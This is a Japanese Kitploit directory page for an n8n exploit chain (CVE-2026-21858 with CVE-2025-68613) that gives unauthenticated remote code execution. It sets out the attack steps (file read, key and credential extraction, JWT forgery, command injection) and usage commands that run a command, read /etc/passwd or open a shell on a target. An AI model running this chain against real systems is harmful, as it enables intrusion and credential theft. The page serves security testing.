Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21858 — n8nにおける未認証リモートコード実行のためのエクスプロイトチェーン。コンテンツタイプの混乱と式インジェクションを組み合わせて、ファイルの読み取り、JWTの偽造、コマンドの実行を行います。 | Kitploit
ツール/GitHubGitHub/sec-dojo-com/cve-2026-21858
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubsec-dojo-com/cve-2026-21858

CVE-2026-21858

n8nにおける未認証リモートコード実行のためのエクスプロイトチェーン。コンテンツタイプの混乱と式インジェクションを組み合わせて、ファイルの読み取り、JWTの偽造、コマンドの実行を行います。

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-21858 + CVE-2025-68613 - n8n RCEエクスプロイト

n8n < 1.121.0 における未認証RCEチェーン(CVSS 10.0)

攻撃チェーン

  1. CVE-2026-21858 - Content-Typeの混乱 → /home/node/.n8n/config と database.sqlite を読み取る
  2. ファイルから暗号化キーと管理者認証情報を抽出
  3. 管理者JWTトークンを偽造
  4. CVE-2025-68613 - 式インジェクション → child_process を介してコマンドを実行

使用方法

root@kitploit:~
# コマンドを実行
python3 exploit.py http://target:5678 /form/test --cmd "id"

# ファイルを読み取る
python3 exploit.py http://target:5678 /form/test --read /etc/passwd

# 対話型シェル
python3 exploit.py http://target:5678 /form/test

要件

ターゲットには以下のアクティブなワークフローが必要です:

  • ファイルアップロードフィールドを持つフォームトリガーノード
  • バイナリデータを返すWebhook応答ノード
  • 公開アクセス可能なフォームエンドポイント
  • 参考

    • Cyera Research - Ni8mare
    • Chocapikkによるオリジナルエクスプロイト
    ツールをダウンロード